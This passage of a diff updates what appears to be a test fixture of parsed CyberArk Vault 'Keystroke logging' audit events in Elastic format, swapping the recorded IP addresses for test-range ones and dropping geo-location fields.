\u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -601,14 +513,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -618,9 +530,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 03:35:08", "desc": "Keystroke logging" @@ -631,8 +543,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191941800Z", - "original": "\u003c5\u003e1 2021-03-15T10:35:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:08\",\"IsoTimestamp\":\"2021-03-15T10:35:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165114900Z", + "original": "\u003c5\u003e1 2021-03-15T10:35:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:08\",\"IsoTimestamp\":\"2021-03-15T10:35:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -654,39 +566,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -703,7 +594,7 @@ }, "@timestamp": "2021-03-15T14:11:18.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -714,16 +605,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:11:18Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -737,8 +627,8 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, @@ -746,7 +636,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -759,9 +649,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 07:11:18", "desc": "Keystroke logging" @@ -772,8 +662,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.192007800Z", - "original": "\u003c5\u003e1 2021-03-15T14:11:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:18\",\"IsoTimestamp\":\"2021-03-15T14:11:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165120Z", + "original": "\u003c5\u003e1 2021-03-15T14:11:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 